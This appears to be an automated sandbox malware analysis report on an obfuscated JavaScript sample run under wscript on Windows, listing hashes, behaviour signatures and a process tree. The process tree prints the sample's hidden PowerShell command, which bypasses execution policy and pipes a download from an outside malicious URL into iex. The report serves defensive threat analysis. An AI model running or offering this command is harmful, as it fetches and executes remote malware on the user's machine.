Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240903-en -
submitted
03/03/2025, 14:19
Static task
static1
Behavioral task
behavioral1
Sample
aec2646ebe29ad68516daec6f9cc1899e6a7a6278d72ce6a1c5c6ebe8158bac1.js
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
aec2646ebe29ad68516daec6f9cc1899e6a7a6278d72ce6a1c5c6ebe8158bac1.js
Resource
win10v2004-20250217-en
General
-
Target
aec2646ebe29ad68516daec6f9cc1899e6a7a6278d72ce6a1c5c6ebe8158bac1.js
-
Size
595KB
-
MD5
e11e833bd0845410c1fd9e1e36159f35
-
SHA1
dd3973964cbabf55907780345f52570b6738d912
-
SHA256
aec2646ebe29ad68516daec6f9cc1899e6a7a6278d72ce6a1c5c6ebe8158bac1
-
SHA512
a3d3458ec3540bbbdc3f71ef8fc791cbcad92edb996e0eddf56d5b34459b85f753ae757919d9b21ccd5005d61ef05e601a4b9bf1bf204dcc971c6f27efa22e7a
-
SSDEEP
1536:ay99U99cssqg09Cqg099sqg09Nsqg09Qsq1sqg09V09esqg09Ysqg09Lsqqsqg07:YG
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2388 powershell.exe -
Deletes itself 1 IoCs
pid Process 2232 wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2388 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2388 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2232 wrote to memory of 2388 2232 wscript.exe 31 PID 2232 wrote to memory of 2388 2232 wscript.exe 31 PID 2232 wrote to memory of 2388 2232 wscript.exe 31
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\aec2646ebe29ad68516daec6f9cc1899e6a7a6278d72ce6a1c5c6ebe8158bac1.js1⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:2232 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -C " curl http://hisatophjrok12.top/1.php?s=flibabc11 |iex"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2388
-